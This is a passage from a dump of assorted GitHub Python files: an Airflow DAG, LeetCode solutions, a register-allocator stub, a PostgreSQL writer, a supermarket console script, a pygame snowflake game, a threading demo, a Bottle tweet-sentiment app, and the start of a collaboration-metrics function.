install_requires=read_requirements(),\n python_requires=\">=3.6\",\n license=\"Apache License 2.0\",\n keywords=\"options, argparse, config, cli, YAML, INI\",\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: Implementation :: CPython\",\n ],\n)\n","repo_name":"zhangxianbing/pyclier","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9881129857","text":"from airflow import DAG\nfrom airflow.providers.cncf.kubernetes.operators.kubernetes_pod import (\n KubernetesPodOperator,\n)\nfrom pendulum import datetime\n\ndefault_args = {\n \"start_date\": datetime(2023, 10, 1),\n}\n\nwith DAG(dag_id=\"example_kubernetes_pod\", schedule=\"@daily\", default_args=default_args) as dag:\n KubernetesPodOperator(\n image=\"asset-materialization-image:latest\",\n cmds=[\"python\", \"create_asset.py\", \"--execution-date\", \"{{ ds }}\"],\n name=\"asset-materialization-pod\",\n task_id=\"asset-materialization-task\",\n in_cluster=False,\n cluster_context=\"kind-kind\",\n config_file=\"/opt/airflow/.kube/config\",\n is_delete_operator_pod=True,\n get_logs=True,\n # If xcom_push is True, the content of the file /airflow/xcom/return.json in the container\n # will also be pushed to an XCom when the container completes.\n xcom_push=True,\n )\n","repo_name":"dagster-io/dagster","sub_path":"examples/experimental/external_assets/airflow_example.py","file_name":"airflow_example.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"72070908007","text":"# 请根据每日 气温 
列表 temperatures ,重新生成一个列表,要求其对应位置的输出为:要想观测到更高的气温,至少需要等待的天数。如果气温在这之后都不\n# 会升高,请在该位置用 0 来代替。 \n# \n# \n# \n# 示例 1: \n# \n# \n# 输入: temperatures = [73,74,75,71,69,72,76,73]\n# 输出: [1,1,4,2,1,1,0,0]\n# \n# \n# 示例 2: \n# \n# \n# 输入: temperatures = [30,40,50,60]\n# 输出: [1,1,1,0]\n# \n# \n# 示例 3: \n# \n# \n# 输入: temperatures = [30,60,90]\n# 输出: [1,1,0] \n# \n# \n# \n# 提示: \n# \n# \n# 1 <= temperatures.length <= 10⁵ \n# 30 <= temperatures[i] <= 100 \n# \n# \n# \n# \n# 注意:本题与主站 739 题相同: https://leetcode-cn.com/problems/daily-temperatures/ \n# Related Topics 栈 数组 单调栈 👍 26 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nfrom typing import List\n\n\nclass Solution:\n # def dailyTemperatures(self, temperatures: List[int]) -> List[int]:\n # \"\"\"\n # 方法1:暴力遍历; 能解,但会超时;\n # :param temperatures:\n # :return:\n # \"\"\"\n # res = []\n # for i, t in enumerate(temperatures):\n # for j in range(i, len(temperatures)):\n # if temperatures[j] > t:\n # res.append(j - i)\n # break\n # elif j == len(temperatures) - 1:\n # res.append(0)\n # break\n # return res\n\n # def dailyTemperatures(self, temperatures: List[int]) -> List[int]:\n # \"\"\"\n # 方法2:单调栈。此题实际上是找每个数右边第一个比它大的数,即单调栈问题。\n # :param temperatures:\n # :return:\n # \"\"\"\n # ret = [0 for _ in range(len(temperatures))]\n # # 栈中存放数组下标,栈中下标表示的温度按照降序排列。当温度大于栈顶温度时,即出栈。\n # stack = []\n # for idx, t in enumerate(temperatures):\n # # 栈为空或者栈顶温度小于当前温度时,计算栈顶与当前日期的时间差,把栈顶弹出;\n # while stack and temperatures[stack[-1]] < t:\n # ret[stack[-1]] = idx - stack[-1]\n # stack.pop()\n # # 把当前温度的日期入栈。\n # stack.append(idx)\n # return ret\n\n def dailyTemperatures(self, temperatures: List[int]) -> List[int]:\n \"\"\"\n 方法3:单调栈。倒着遍历。\n \"\"\"\n n = len(temperatures)\n res = [0 for _ in range(n)]\n\n stack = []\n for i in range(n-1, -1, -1):\n while stack and temperatures[stack[-1]] <= temperatures[i]:\n stack.pop()\n\n if stack:\n res[i] = stack[-1] - i\n stack.append(i)\n return res\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n\nif __name__ == '__main__':\n temperatures = [73, 74, 75, 71, 69, 72, 76, 73]\n result = Solution().dailyTemperatures(temperatures)\n print(result)\n","repo_name":"zh805/algorithm","sub_path":"leetcode/python/leetcode/editor/cn/[剑指 Offer II 038]每日温度.py","file_name":"[剑指 Offer II 038]每日温度.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12569790235","text":"from codegen.liveness import liveness_analysis\nfrom codegen.instr import LABEL as L, MOVE as M, OPER as O\nfrom ir.nodes import Temp\n\nclass Spill(Exception):\n\n def __init__(self, temp):\n super().__init__(\"Temporary {} requires spilling\".format(temp))\n self.temp = temp\n\ndef colorize(frame, instrs):\n \"\"\"Return a map of registers allocation or fail with a Spill exception if\n a color cannot be allocated for a register.\"\"\"\n interferences, coalesces = liveness_analysis(frame, instrs)\n # List of mappings after register allocation or coalescing\n remapped = {}\n # Number of registers\n k = len(frame.registers)\n # Stack of registers to later color when unstacking\n stack = []\n # Temporaries not stacked yet\n temporaries = set(interferences.keys()).difference(frame.registers)\n\n def canon(reg):\n \"\"\"Find the canonical representation of a register in the remapping table.\n Mappings are updated to the final destination while the call chain gets rewound.\"\"\"\n target = remapped.get(reg)\n if target:\n final = 
canon(target)\n if final != target:\n remapped[reg] = final\n return final\n return reg\n\n def mark_coalesced(a, b):\n \"\"\"Coalesce a and b. Physical registers are always selected as the target. If one of them\n is a physical register, it will always be the target of the remapping. The interferences\n entry for a will be merged into the one of b then removed, same for the coalesces entries.\n Also, a will be removed from the temporaries as it has been taken care of.\"\"\"\n a, b = canon(a), canon(b)\n if a in frame.registers:\n assert b not in frame.registers, \"cannot coalesce physical registers {} and {}\".format(a, b)\n a, b = b, a\n remapped[a] = b\n raise NotImplementedError(\"marking registers as coalesced\")\n\n def push_to_stack(t):\n \"\"\"Push a temporary and its interferences to the stack, and clear its\n interferences in the live tree. Also remove it from the temporaries list.\n Pushing the interferences of the temporary along with it allows to easily\n determine an available color when unstacking.\"\"\"\n raise NotImplementedError(\"push to stack\")\n\n def simplify():\n \"\"\"Push one temporary of insignificant degree not involved in a MOVE operation\n to the stack and return it. It gets removed from the temporaries list. If none is\n found, return None.\"\"\"\n raise NotImplementedError(\"simplify\")\n\n def coalesce():\n \"\"\"Coalesce two temporaries involved in a MOVE operation so that they do not\n prevent the new node from being simplified. Return the pair that has been coalesced\n or None otherwise.\"\"\"\n raise NotImplementedError(\"coalesce\")\n\n def spill_candidate():\n \"\"\"Find a spill candidate with the best score. We do not take loops into account.\"\"\"\n raise NotImplementedError(\"spill candidate\")\n\n def unstack():\n \"\"\"Pop and color temporaries from the stack. If a temporary cannot\n get a color that none of his neighbour has, we need to spill it. A Spill\n exception will be raised to indicate that spilling needs to occur and\n the whole process must be started again. The parameter of the exception\n will indicate the register that needs spilling\"\"\"\n raise NotImplementedError(\"unstack\")\n\n def apply_mappings():\n \"\"\"Apply register mappings and return a list of instructions with\n only physical registers. Redundant move operations and non-jumped-to\n labels will be removed to. The stack size for the function is now\n known and the appropriate label will be replaced by a stack\n allocation. The cleaned up list of instructions will be returned.\"\"\"\n raise NotImplementedError(\"apply mappings\")\n\n while temporaries:\n simplified_or_coalesced = False\n\n # Simplify as much as possible\n while True:\n n = simplify()\n if n:\n simplified_or_coalesced = True\n else:\n break\n\n # Coalesce as much as possible\n while True:\n p = coalesce()\n if p:\n simplified_or_coalesced = True\n else:\n break\n\n # We went a full round without simplification or coalescing.\n # If possible, we will break a coalescing bound, otherwise,\n # we will have to spill a potential candidate. 
Hopefully,\n # when unstacking, several neighbours will have the same color\n # and we will not have to really spill it.\n if not simplified_or_coalesced:\n candidates = temporaries.intersection(coalesces.keys())\n if candidates:\n weights = dict((node, len(interferences[node])) for node in candidates)\n to_remove = min(weights.keys(), key=lambda n: weights[n])\n for n in coalesces[to_remove]:\n coalesces[n].remove(to_remove)\n del coalesces[to_remove]\n else:\n potential_spill = spill_candidate()\n push_to_stack(potential_spill)\n\n # Unstack and color the temporaries with physical registers.\n unstack()\n\n # So far so good, apply mappings and return.\n return apply_mappings()\n\ndef allocate_registers(frame, instrs):\n \"\"\"Allocate registers for the given instructions. If we get a\n Spill exception from colorize, we need to spill the given\n temporary and start over.\"\"\"\n while True:\n try:\n return colorize(frame, instrs)\n except Spill as spill_exception:\n instrs = spill_temporary(frame, instrs, spill_exception.temp)\n\ndef spill_temporary(frame, instrs, spill):\n \"\"\"Spill a temporary, reload it before every use through a new temporary,\n save it after every def through a new temporary. Those temporary will\n replace the spilled temporary in the original instructions, so that\n the new lifetimes are kept very short.\"\"\"\n # Allocate a new spill space in the frame\n saved_offset = frame.alloc_spill()\n raise NotImplementedError(\"spill temporary for {}\".format(spill))\n","repo_name":"ErwanCheriaux/SE202","sub_path":"codegen/alloc.py","file_name":"alloc.py","file_ext":"py","file_size_in_byte":6246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36134989164","text":"\"\"\"\nGiven an n x n binary matrix image, flip the image horizontally, then invert it, and return the resulting image.\n\nTo flip an image horizontally means that each row of the image is reversed.\n\nFor example, flipping [1,1,0] horizontally results in [0,1,1].\nTo invert an image means that each 0 is replaced by 1, and each 1 is replaced by 0.\n\nFor example, inverting [0,1,1] results in [1,0,0].\n \n\nExample 1:\n\nInput: image = [[1,1,0],[1,0,1],[0,0,0]]\nOutput: [[1,0,0],[0,1,0],[1,1,1]]\nExplanation: First reverse each row: [[0,1,1],[1,0,1],[0,0,0]].\nThen, invert the image: [[1,0,0],[0,1,0],[1,1,1]]\nExample 2:\n\nInput: image = [[1,1,0,0],[1,0,0,1],[0,1,1,1],[1,0,1,0]]\nOutput: [[1,1,0,0],[0,1,1,0],[0,0,0,1],[1,0,1,0]]\nExplanation: First reverse each row: [[0,0,1,1],[1,0,0,1],[1,1,1,0],[0,1,0,1]].\nThen invert the image: [[1,1,0,0],[0,1,1,0],[0,0,0,1],[1,0,1,0]]\n\"\"\"\n\nclass Solution(object):\n def flipAndInvertImage(self, image):\n \"\"\"\n :type image: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n res = []\n for i in image:\n i = i[::-1]\n for j, v in enumerate(i):\n if v == 1:\n i[j] = 0\n else:\n i[j] = 1\n res.append(i)\n\n return res\n\nsolution = Solution()\nprint(solution.flipAndInvertImage([[1,1,0],[1,0,1],[0,0,0]]))\nprint(solution.flipAndInvertImage([[1,1,0,0],[1,0,0,1],[0,1,1,1],[1,0,1,0]]))","repo_name":"MeongGanas/leetcode-python","sub_path":"easy/Flipping_an_Image.py","file_name":"Flipping_an_Image.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33513323343","text":"\"\"\"This is the general PostgreSQL writer.\n\n:author: gkathuria\n:date: March 31, 2014\n\"\"\"\n\nimport psycopg2\n\nimport 
data_generation.writers.datefilters as writers_filters\nimport data_generation.writers.util as writers_util\n\n\navailable_filters = writers_filters.FILTERS\n\n\ndef register_filters(filters):\n \"\"\"Add custom filters to the CSV writer filtering register.\n\n :param filters: A dictionary of filters to register\n \"\"\"\n global available_filters\n available_filters = dict(list(available_filters.items()) + list(filters.items()))\n\n\ndef create_dbcon(host, port, dbname, user, password):\n conn_string = \"host=%s port=%s dbname=%s user=%s password=%s\" %(host,port,dbname,user,password)\n print(\"connecting to database %s\" %conn_string)\n conn = psycopg2.connect(conn_string)\n return conn\n\n\ndef create_table(conn, tblname, columns=None):\n \"\"\"Create the table with columns and types provided in Postgres database\n\n :param conn: Connection to PostgresSQL database created using create_dbconn\n :param table: Name of the table\n :param columns: The columns that define the structure of the table\n \"\"\"\n cursor = conn.cursor()\n\n stmt=''\n for c in columns:\n colnametype = c['name']+' '+c['type']\n stmt = stmt+colnametype+','\n\n print(\"drop table if exists %s\" % tblname[:-4])\n print(\"create table %s (%s)\" % (tblname[:-4], stmt[:-1]))\n\n cursor.execute(\"drop table if exists %s\" % tblname[:-4])\n cursor.execute(\"create table %s (%s)\" % (tblname[:-4], stmt[:-1]))\n\n conn.commit()\n\n\ndef write_records_to_table(conn, tbl_name, columns, entities, entity_filter=None):\n \"\"\"For a list of entity objects, write a record to an output path. This requires that the objects in the entities\n parameter have a 'get_object_set' method that returns a dictionary of objects whose attributes are available.\n\n :param conn: Connection to PostgresSQL database created using create_dbconn\n :param tbl_name: Name of table this row is being generated for (optional). This is used to generate unique record\n ID values that are unique within a given table.\n :param columns: The dictionary of columns for data values to write for each entity\n :param entities: A list of entity objects to write out to the table\n :param entity_filter: An (attribute, value) tuple that will be evaluated against each object in entities to see if\n that object should be written to the table. 
If not provided, all entities are written to file.\n The attribute is expected to be directly on the entity and is not checked (will raise an\n exception if not present).\n \"\"\"\n cursor = conn.cursor()\n\n num_col = len([i['name'] for i in columns])\n tbl_ins = \"insert into %s (%s) values\" % (tbl_name, ', '.join(column['name'] for column in columns))\n\n lst = ['%s' for _ in range(num_col)]\n col_list = ','.join(lst)\n\n stmt = tbl_ins + '('+col_list+')'\n\n # Get each row of data\n params = []\n for entity in entities:\n if entity_filter is None or getattr(entity, entity_filter[0]) == entity_filter[1]:\n params.append(writers_util.build_csv_row_values(entity.get_object_set(), columns, available_filters,\n tbl_name))\n\n # Write all rows\n try:\n cursor.executemany(stmt, params)\n\n except psycopg2.DataError as e:\n print(\"NAME: \", tbl_name)\n print(\"#COLS:\", num_col)\n print(\"STMT: \", stmt)\n print(\"PARAMS: \", tuple(zip((column['name'] for column in columns), params[0])))\n raise\n\n except psycopg2.IntegrityError as e:\n print(\"NAME: \", tbl_name)\n print(\"#COLS:\", num_col)\n print(\"STMT: \", stmt)\n print(\"PARAMS: \", tuple(zip((column['name'] for column in columns), params[0])))\n raise\n\n # Cleanup\n cursor.close()\n conn.commit()\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"data_gen/data_generation/writers/writepostgres.py","file_name":"writepostgres.py","file_ext":"py","file_size_in_byte":3942,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"576678139","text":"#定义仓库\nrepository = dict()\n#定义购物清单对象\nshop_list= []\n\n#定义一个函数来初始化商品\ndef init_repository():\n #初始化很多商品,每个元组代表一个商品\n goods1 = (\"1000001\", \"疯狂Ruby讲义\", 88.0)\n goods2 = (\"1000002\", \"疯狂Swift讲义\", 69.0)\n goods3 = (\"1000003\", \"疯狂Kotlin讲义\", 59.0)\n goods4 = (\"1000004\", \"疯狂JAVA讲义\", 109.0)\n goods5 = (\"1000005\", \"疯狂Android讲义\", 108.0)\n goods6 = (\"1000006\", \"疯狂IOS讲义\", 77.0)\n #把商品放入库中\n repository[goods1[0]] = goods1\n repository[goods2[0]] = goods2\n repository[goods3[0]] = goods3\n repository[goods4[0]] = goods4\n repository[goods5[0]] = goods5\n repository[goods6[0]] = goods6\n#显示超时的商品清单,就是遍历代表仓库的dict字典\ndef show_goods():\n print(\"欢迎光临 疯狂超市\")\n print(\"疯狂超市的商品清单\")\n print(\"%13s%40s%10s\"%(\"条码\", \"商品名称\", \"单价\"))\n #遍历repository中所有value来显示商品清单\n for goods in repository.values():\n print(\"%15s%40s%12s\" % goods)\n#显示购物清单,就是遍历代表购物清单的list的列表\ndef show_list():\n print('=' * 100)\n #如果清单不为空,则输出清单内容\n if not shop_list:\n print(\"还未购买商品\")\n else:\n title = \"%-5s|%15s|%40s|%10s|%4s|%10s\" % \\\n (\"ID\", \"条码\", \"商品名称\", \"单价\", \"数量\", \"小计\")\n print(title)\n print(\"-\" * 100)\n #记录总计的价钱\n sum = 0\n #遍历代表购物清单的list列表\n for i, item in enumerate(shop_list):\n #转换id为索引加1\n id = i + 1\n #获取该购物明细的第1个元素:商品条码\n code = item[0]\n #获取商品条码读取商品,再获取商品名称\n name = repository[code][1]\n #获取商品条码读取商品,再获取商品单价\n price = repository[code][2]\n #获取该购物明细项的第二个元素:商品数量\n number = item[1]\n #小计\n amount = price * number\n #计算总计\n sum = sum + amount\n line = \"%-5s|%17s|%40s|%12s|%6s|%12s\" % \\\n (id, code, name, price, number, amount)\n print(line)\n print(\"-\" * 100)\n print(\" 总计:\", sum)\n print(\"=\" * 100)\n#添加购买的商品,就是想代表用户购物清单的list列表中添加一项\ndef add():\n #等待输入条码\n code = input(\"请输入商品条码:\\n\" )\n #如果没有找到条码,条码错误\n if code not in repository:\n print(\"条码错误,请重新输入\")\n return\n #根据条码找商品\n goods = repository[code]\n #等待输入数量\n number = input(\"输入你要购买的数量:\\n\")\n #把商品和购买的数量封装成list后加入购物车清单中\n 
shop_list.append([code,int(number)])\n#修改购买商品的数量,就是修改代表用户购物清单的list列表元素\ndef edit():\n id = input(\"请输入要修改的购物明细项目的ID:\\n\")\n #id减1得到购物明细项目的索引\n index = int(id) - 1\n #根据索引获取某个购物明细项\n item = shop_list[index]\n #提示输入新的购买数量\n number = input(\"请输入重新购买的数量:\\n\")\n #修改item里的number\n item[1] = int(number)\n#删除以后买的商品明细项,就是删除代表用户购物清单的list列表的元素\ndef delete():\n id = input(\"请输入要删除的购物明细项的ID:\")\n index= int(id) - 1\n #直接根据所从清单里面删除购物明细项\n del shop_list[index]\ndef payment():\n show_list()\n print('\\n' * 3)\n print(\"欢迎下次光临\")\n #退出程序\n import os\n os._exit(0)\ncmd_dict = {'a': add, 'e': edit, 'd': delete, 'p': payment, 's':show_list}\n#显示命令提示\ndef show_command():\n #等待命令\n cmd = input(\"请输入指令:\\n\" +\n \"添加(a) 修改(e) 删除(d) 结算(p) 超市商品(s) \\n\")\n #如果用户输入的字符串没有对应的命令\n if cmd not in cmd_dict:\n print(\"不要玩!\")\n else:\n cmd_dict[cmd]()\ninit_repository()\nshow_goods()\n#显示清单和操作命令提示\nwhile True:\n show_list()\n show_command()","repo_name":"ChenFu0420/leranpython","sub_path":"4parts/supermarket.py","file_name":"supermarket.py","file_ext":"py","file_size_in_byte":4424,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39840673987","text":"import pygame\r\nimport sys\r\nimport random\r\n\r\npygame.init()\r\n\r\n# Proste ustawienai okna gry oraz nazwa\r\nwidth, height = 800, 600\r\nscreen = pygame.display.set_mode((width, height))\r\npygame.display.set_caption(\"Topienie Śniegu\")\r\n\r\n# kolory które będą używane podczas gry\r\nwhite = (255, 255, 255)\r\nblack = (0, 0, 0)\r\n\r\n# ustawienia płatka sniegu\r\nsnowflake_size = 40\r\nsnowflake_color = (255, 255, 255)\r\nsnowflakes = []\r\n\r\n# ustawienie gry na stan poczatkowy\r\nclock = pygame.time.Clock()\r\ngame_over = False\r\nscore = 0\r\n\r\nwhile not game_over: # prosta petla ktora dziala do czasu aż nie zostanie spełniony warunek quit. 
W ifie sprawdzamy po prostu czy klikniecie\r\n for event in pygame.event.get(): # uzytkownika zawiera sie w rozmiarze naszego platka sniegu, jesli tak score idzie w gore\r\n if event.type == pygame.QUIT: # a platek jest kasowany, jesli nie to warunek quit jest spelniony i game_over ustawia sie na true co konczy rozgrywke\r\n game_over = True\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n mouse_x, mouse_y = pygame.mouse.get_pos()\r\n for snowflake in snowflakes:\r\n if (\r\n snowflake[0] < mouse_x < snowflake[0] + snowflake_size\r\n and snowflake[1] < mouse_y < snowflake[1] + snowflake_size\r\n ):\r\n score += 1\r\n snowflakes.remove(snowflake)\r\n\r\n # dodawanie platkow sniegu, czestotliwosc generowania oraz losowe rozmieszczanie u gory ekranu\r\n if random.randint(0, 100) < 7:\r\n snowflakes.append([random.randint(0, width - snowflake_size), 0])\r\n\r\n # aktualizowanie pozycji platkow sniegu - innymi slowy proces ich spadku\r\n for snowflake in snowflakes:\r\n snowflake[1] += 2\r\n if snowflake[1] > height: # jesli platek spadnie \"poza\" ekran gra sie konczy\r\n game_over = True\r\n\r\n # rysowanie tla gry\r\n screen.fill(black)\r\n\r\n # samo w sobie rysowanie platkow sniegu\r\n for snowflake in snowflakes:\r\n pygame.draw.rect(screen, snowflake_color, (snowflake[0], int(snowflake[1]), snowflake_size, snowflake_size))\r\n\r\n # scoreboard w lewym gornym rogu rozgrywki\r\n font = pygame.font.Font(None, 36)\r\n score_text = font.render(f\"Score: {score}\", True, white)\r\n screen.blit(score_text, (10, 10))\r\n\r\n pygame.display.flip()\r\n clock.tick(24) # ilosc klatek\r\n\r\n# Zakończenie gry\r\npygame.quit()\r\nsys.exit()\r\n","repo_name":"Dawid141/Python2023","sub_path":"cw_9/snowflakes.py","file_name":"snowflakes.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15384584825","text":"import threading\nfrom time import sleep\ndef sum():\n j=0\n for i in range(1,6):\n print(i)\n j = j+i\n sleep(1)\n print(j)\n\ndef factorial(num):\n mul =1\n for i in range(1,num+1):\n print(i)\n mul = mul*i\n sleep(1)\n print(mul)\nthread = threading.Thread(target=sum)\nthread2 = threading.Thread(target=factorial,args=(5,))\nthread.start()\nthread2.start()\nthread.join()\nthread2.join()\n#print(sum())\n#print(factorial(5))\nprint(\"Executed\")","repo_name":"iPalashAcharya/PythonLearning","sub_path":"oops/threading_numbers.py","file_name":"threading_numbers.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10376477257","text":"import os\nimport asyncio\nimport pathlib\nimport random\nimport string\nimport time\nimport typing as tp\n\nimport sha3\nimport solcx\nfrom eth_abi import abi\nfrom eth_utils import keccak\nfrom pythclient.pythaccounts import PythPriceAccount\nfrom pythclient.solana import SolanaClient, SolanaPublicKey, SOLANA_MAINNET_HTTP_ENDPOINT\n\n\ndef get_sol_price() -> float:\n \"\"\"Get SOL price from Solana mainnet\"\"\"\n\n async def get_price():\n account_key = SolanaPublicKey(\"H6ARHf6YXhGYeQfUzQNGk6rDNnLBQKrenN712K4AQJEG\")\n solana_client = SolanaClient(endpoint=SOLANA_MAINNET_HTTP_ENDPOINT)\n price: PythPriceAccount = PythPriceAccount(account_key, solana_client)\n await price.update()\n await solana_client.close()\n return price.aggregate_price\n\n result = asyncio.run(get_price())\n return result\n\n\ndef get_contract_abi(name, compiled):\n for key in compiled.keys():\n 
if name == key.rsplit(\":\")[-1]:\n return compiled[key]\n\n\ndef get_contract_interface(contract: str, version: str, contract_name: tp.Optional[str] = None,\n import_remapping: tp.Optional[dict] = None):\n if not contract.endswith(\".sol\"):\n contract += \".sol\"\n if contract_name is None:\n if \"/\" in contract:\n contract_name = contract.rsplit(\"/\", 1)[1].rsplit(\".\", 1)[0]\n else:\n contract_name = contract.rsplit(\".\", 1)[0]\n\n if version not in [str(v) for v in solcx.get_installed_solc_versions()]:\n solcx.install_solc(version)\n if contract.startswith(\"/\"):\n contract_path = pathlib.Path(contract)\n else:\n contract_path = (pathlib.Path.cwd() / \"contracts\" / f\"{contract}\").absolute()\n if not contract_path.exists():\n contract_path = (pathlib.Path.cwd() / \"contracts\" / \"external\" / f\"{contract}\").absolute()\n\n assert contract_path.exists(), f\"Can't found contract: {contract_path}\"\n\n compiled = solcx.compile_files([contract_path],\n output_values=[\"abi\", \"bin\"],\n solc_version=version,\n import_remappings=import_remapping,\n allow_paths=[\".\"],\n optimize=True\n ) # this allow_paths isn't very good...\n contract_interface = get_contract_abi(contract_name, compiled)\n\n return contract_interface\n\n\ndef gen_hash_of_block(size: int) -> str:\n \"\"\"Generates a block hash of the given size\"\"\"\n try:\n block_hash = hex(int.from_bytes(os.urandom(size), \"big\"))\n if len(block_hash[2:]) == size * 2:\n return block_hash\n else:\n return gen_hash_of_block(size)\n except ValueError:\n return gen_hash_of_block(size)\n\n\ndef generate_text(min_len: int = 2, max_len: int = 200, simple: bool = True) -> str:\n length = random.randint(min_len, max_len)\n if simple:\n chars = string.ascii_letters + string.digits\n else:\n chars = string.printable[:-5]\n return ''.join(random.choice(chars) for _i in range(length)).strip()\n\n\ndef wait_condition(func_cond, timeout_sec=15, delay=0.5):\n start_time = time.time()\n while True:\n if time.time() - start_time > timeout_sec:\n raise TimeoutError(f\"The condition not reached within {timeout_sec} sec\")\n try:\n if func_cond():\n break\n except Exception as e:\n print(f\"Error during waiting: {e}\")\n time.sleep(delay)\n return True\n\n\ndef decode_function_signature(function_name: str, args=None) -> str:\n data = keccak(text=function_name)[:4]\n if args is not None:\n types = function_name.split(\"(\")[1].split(\")\")[0].split(\",\")\n data += abi.encode(types, args)\n return \"0x\" + data.hex()\n\n\ndef get_selectors(abi):\n \"\"\"Get functions signatures with params as keccak256 from contract abi\"\"\"\n selectors = []\n for function in filter(lambda item: item[\"type\"] == \"function\", abi):\n input_types = \"\"\n for input in function[\"inputs\"]:\n if 'struct' in input[\"internalType\"]:\n struct_name = input[\"name\"]\n struct_types = \",\".join(i[\"type\"] for i in input[\"components\"] if i[\"name\"] != struct_name)\n input_types += \",\" + f\"({struct_types})[]\"\n else:\n input_types += \",\" + input[\"type\"]\n\n input_types = input_types[1:]\n keccak256 = sha3.keccak_256()\n keccak256.update(f\"{function['name']}({input_types})\".encode())\n encoded_selector = f\"{function['name']}({input_types})\"\n selectors.append(keccak(text=encoded_selector)[:4])\n return selectors\n","repo_name":"neonevm/neon-tests","sub_path":"utils/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} 
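Editor's aside between dataset records, not itself a record: the helpers.py entry above builds EVM calldata in decode_function_signature by hashing the canonical signature and appending ABI-encoded arguments. Below is a minimal runnable sketch of the same pattern, assuming only the eth_utils and eth_abi packages that file already imports; the encode_call name and the example address are illustrative, not from the dataset.

from eth_abi import abi
from eth_utils import keccak

def encode_call(signature: str, args: list) -> str:
    # First 4 bytes of keccak256 over the canonical signature select the function.
    selector = keccak(text=signature)[:4]
    # Argument types are parsed straight from the signature, e.g. ["address", "uint256"].
    types = signature.split("(")[1].rstrip(")").split(",")
    # Calldata = selector + ABI-encoded arguments, hex-encoded for JSON-RPC transport.
    return "0x" + (selector + abi.encode(types, args)).hex()

# keccak("transfer(address,uint256)")[:4].hex() == "a9059cbb", the well-known ERC-20 transfer selector.
print(encode_call("transfer(address,uint256)", ["0x" + "11" * 20, 1000]))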
+{"seq_id":"41608496260","text":"import cv2 \r\n## we import opencv as cv2 because the devlopers named the pakage/module as cv2 \r\n\r\nimg1 = cv2.imread(\"C:\\\\Users\\\\naincy\\\\Desktop\\\\DATA_SET_\\\\BEACH.jpg\",1) \r\n#always remmember to add // while writting an path else it will relese an error\r\n\r\nimg1 = cv2.resize(img1,(1200,1200))\r\n ## resize your image if needed\r\n\r\ncv2.imshow(\"orignal\",img1)\r\n # here \" orignal \" is our window name where we'll see our image \r\n\r\ncv2.waitKey() \r\n# it holds the output window. we can add any integer number here . if we want aur output to be visable for 3 sec only than we can add 3 as it's parametere \r\n\r\ncv2.destroyAllWindows()\r\n # cleres the priviously done operations\r\n","repo_name":"naincy1927/COMPUTER_VISION","sub_path":"coloured_image.py","file_name":"coloured_image.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18030861569","text":"from bottle import route,run\nimport bottle\nfrom joblib import load\nfrom get_tweets import get_related_tweets\nimport pandas as pd\nimport simplejson as json\nimport os\n\n\npipeline = load(\"text_classification.joblib\")\npd.set_option(\"display.max_rows\", None, \"display.max_columns\", None)\n\n\ndef requestResults(name):\n tweets = get_related_tweets(name)\n tweets['prediction'] = pipeline.predict(tweets['tweet_text'])\n data = str(tweets.prediction.value_counts()) + '\\n\\n'\n return data + str(tweets)\n\n\napp= bottle.Bottle()\n\nbottle.TEMPLATE_PATH.insert(0,\"./\")\n\n@route('/', method=['POST', 'GET'])\ndef hello():\n if bottle.request.method == 'POST':\n user = str(bottle.request.body.read().decode(\"utf-8\"))\n user = user.split(\"=\")\n return bottle.redirect('/success/'+user[1])\n else:\n return bottle.template(\"./templates/home.html\")\n\n@route('/success/')\ndef success(name):\n return \"\" + str(requestResults(name)) + \" \"\n\nif os.environ.get('APP_LOCATION') == 'heroku':\n run(host=\"0.0.0.0\", port=int(os.environ.get(\"PORT\", 5000)))\nelse:\n run(host='localhost', port=3000, debug=True)\n","repo_name":"SeptianRin/twit_clf","sub_path":"get_sentiment.py","file_name":"get_sentiment.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21073848682","text":"import numpy as np\nimport pandas as pd\nimport math\n\ndef calc_perc_externe_interne_samenwerking(G, organisatie_eenheid, vaste_staf_df, verbose=False):\n \n organisatie_eenheid_meervoud = 'onderzoekslijnen'\n if organisatie_eenheid == 'Research Unit':\n organisatie_eenheid_meervoud = 'research units'\n\n\n # paar dingen nodig:\n # per affiliation (dat is een value binnen organisatie_eenheid):\n # telling van aantal personen binnen deze affiliation (om te normaliseren)\n # telling van aantal \n unique_affiliations = vaste_staf_df[organisatie_eenheid].unique()\n all_metrics = [f'Alle samenwerkingen binnen {organisatie_eenheid.lower()}',\n f'Samenwerkingen binnen 